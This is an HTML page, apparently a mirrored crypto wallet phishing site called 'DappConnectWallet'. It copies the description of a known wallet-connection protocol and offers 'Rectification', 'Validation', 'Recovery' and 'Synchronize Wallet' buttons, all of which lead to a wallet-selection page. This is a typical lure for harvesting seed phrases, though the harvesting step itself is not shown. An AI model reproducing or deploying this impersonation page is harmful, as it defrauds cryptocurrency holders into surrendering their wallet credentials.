<!DOCTYPE html>

<html>




<head>
    <meta name="viewport" content="width=device-width" />
    <meta charSet="utf-8" />
    <title>DappConnectWallet</title>
    <meta name="description" content="DappConnectWallet is a free protocol that lets users manage all their wallets from one space" />
    <link rel="icon" href="favicon.ico" />
    <meta name="next-head-count" content="5" />
    <link rel="preload" href="main.css" as="style" />
    <link rel="stylesheet" href="main.css" data-n-g="" /><noscript data-n-css=""></noscript>
    <link rel="preload" href="_next/static/chunks/webpack-189c53927ffd3caf09c3.js" as="script" />
    <link rel="preload" href="_next/static/chunks/framework-92300432a1172ef1338b.js" as="script" />
    <link rel="preload" href="_next/static/chunks/main-71948af4b0f09c0fc30e.js" as="script" />
    <link rel="preload" href="_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" as="script" />
    <link rel="preload" href="_next/static/chunks/814-16eda819eff2e28d39ff.js" as="script" />
    <link rel="preload" href="/_next/static/chunks/748-ecf7ef402c655d9fd446.js" as="script" />
    <link rel="preload" href="_next/static/chunks/pages/connect-5e1e7bced13f0f8f7567.js" as="script" />
</head>

<body>
    <div id="__next">
        <header class="fixed z-50 w-full bg-white py-4 sm:py-5 px-2 sm:px-3 border-b shadow-md">
            <div class="container max-w-screen-lg mx-auto flex flex-row items-center justify-center">
                <div class="inline-flex items-center justify-center cursor-pointer"><img src="logo.svg" class="h-10 w-10" />
                    <h1 class="text-xl ml-2 font-black" href="index.html"> DappConnectWallet</h1>
                </div>
                <!--div><a class="inline-flex items-center justify-center text-white cursor-pointer hover:text-primary bg-primary hover:bg-transparent font-bold px-6 py-2 rounded-md border-2 border-primary" href="connect">Connect</a></div-->
            </div>
        </header>
        <div class="h-14"></div>
        <main>
            <div class="container max-w-screen-sm mx-auto text-center px-4 md:8 py-10">
                <div class="inline-flex items-center"><img src="logo.svg" height="100" width="100" /></div>
                <div class="my-4 font-light"><a class="font-bold" href="index.html">DappConnectWalletssss</a>  is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. A user can interact securely with any Dapp
                    from their mobile phone, making DappConnectWallet wallets a safer choice compared to desktop or browser extension wallets.</div>
                <div class="my-6">
                    <div class="flex flex-col items-center">
                        <a class="cursor-pointer rounded-md mb-4 text-primary border-2 border-primary w-2/3 font-semibold text-center py-3" href="choose-wallet.html">Rectification</a>
                        <a class="cursor-pointer rounded-md mb-4 text-primary border-2 border-primary w-2/3 font-semibold text-center py-3" href="choose-wallet.html">Validation</a>
                        <a class="cursor-pointer rounded-md mb-4 text-primary border-2 border-primary w-2/3 font-semibold text-center py-3" href="choose-wallet.html">Recovery</a>
                        <a class="cursor-pointer rounded-md text-white bg-primary shadow  border-2 border-primary w-2/3 font-semibold text-center py-3" href="choose-wallet.html">Synchronize Wallet</a>
                    </div>
                </div>
            </div>
        </main>
        <footer class="border-t border-gray-200">
            <div class="container max-w-screen-lg mx-auto flex flex-col md:flex-row md:items-center md:justify-between py-6">
                <ul class="flex mb-4 mx-auto md:mx-0 md:ml-4 md:mb-0">
                    <li><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Twitter"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M24 11.5c-.6.3-1.2.4-1.9.5.7-.4 1.2-1 1.4-1.8-.6.4-1.3.6-2.1.8-.6-.6-1.5-1-2.4-1-1.7 0-3.2 1.5-3.2 3.3 0 .3 0 .5.1.7-2.7-.1-5.2-1.4-6.8-3.4-.3.5-.4 1-.4 1.7 0 1.1.6 2.1 1.5 2.7-.5 0-1-.2-1.5-.4 0 1.6 1.1 2.9 2.6 3.2-.3.1-.6.1-.9.1-.2 0-.4 0-.6-.1.4 1.3 1.6 2.3 3.1 2.3-1.1.9-2.5 1.4-4.1 1.4H8c1.5.9 3.2 1.5 5 1.5 6 0 9.3-5 9.3-9.3v-.4c.7-.5 1.3-1.1 1.7-1.8z"></path></svg></a></li>
                    <li class="ml-4"><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Github"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M16 8.2c-4.4 0-8 3.6-8 8 0 3.5 2.3 6.5 5.5 7.6.4.1.5-.2.5-.4V22c-2.2.5-2.7-1-2.7-1-.4-.9-.9-1.2-.9-1.2-.7-.5.1-.5.1-.5.8.1 1.2.8 1.2.8.7 1.3 1.9.9 2.3.7.1-.5.3-.9.5-1.1-1.8-.2-3.6-.9-3.6-4 0-.9.3-1.6.8-2.1-.1-.2-.4-1 .1-2.1 0 0 .7-.2 2.2.8.6-.2 1.3-.3 2-.3s1.4.1 2 .3c1.5-1 2.2-.8 2.2-.8.4 1.1.2 1.9.1 2.1.5.6.8 1.3.8 2.1 0 3.1-1.9 3.7-3.7 3.9.3.4.6.9.6 1.6v2.2c0 .2.1.5.6.4 3.2-1.1 5.5-4.1 5.5-7.6-.1-4.4-3.7-8-8.1-8z"></path></svg></a></li>
                    <li class="ml-4"><a href="#" class="flex justify-center items-center bg-white hover:bg-white-100 rounded-full shadow transition duration-150 ease-in-out" aria-label="Facebook"><svg class="w-8 h-8 fill-current" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><path d="M14.023 24L14 17h-3v-3h3v-2c0-2.7 1.672-4 4.08-4 1.153 0 2.144.086 2.433.124v2.821h-1.67c-1.31 0-1.563.623-1.563 1.536V14H21l-1 3h-2.72v7h-3.257z"></path></svg></a></li>
                </ul>
                <div class="text-sm text-center md:text-right">©
                    <!-- -->2022
                    <!-- --><a class="hover:underline" href="C:\Users\Olabisi\Documents\GitHub\sirtiva\dAppconnect\index.html">DappConnectWalletme.com</a></div>
            </div>
        </footer>
    </div>
    <script id="__NEXT_DATA__" type="application/json">
        {
            "props": {
                "pageProps": {}
            },
            "page": "/connect",
            "query": {},
            "buildId": "5LH9GdAXPhV9OnKcu2OUo",
            "nextExport": true,
            "autoExport": true,
            "isFallback": false
        }
    </script>
    <script nomodule="" src="_next/static/chunks/polyfills-eef578260fd80f8fff94.js"></script>
    <script src="_next/static/chunks/webpack-189c53927ffd3caf09c3.js" async=""></script>
    <script src="_next/static/chunks/framework-92300432a1172ef1338b.js" async=""></script>
    <script src="_next/static/chunks/main-71948af4b0f09c0fc30e.js" async=""></script>
    <script src="_next/static/chunks/pages/_app-9e366951ad03f095f5b3.js" async=""></script>
    <script src="_next/static/chunks/814-16eda819eff2e28d39ff.js" async=""></script>
    <!--script src="_next/static/chunks/pages/connect-5e1e7bced13f0f8f7567.js" async=""></script-->
    <script src="_next/static/5LH9GdAXPhV9OnKcu2OUo/_buildManifest.js" async=""></script>
    <script src="_next/static/5LH9GdAXPhV9OnKcu2OUo/_ssgManifest.js" async=""></script>
</body>
<!-- Mirrored from dappconnectme.com/connect by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 29 Jan 2022 04:41:12 GMT -->

</html>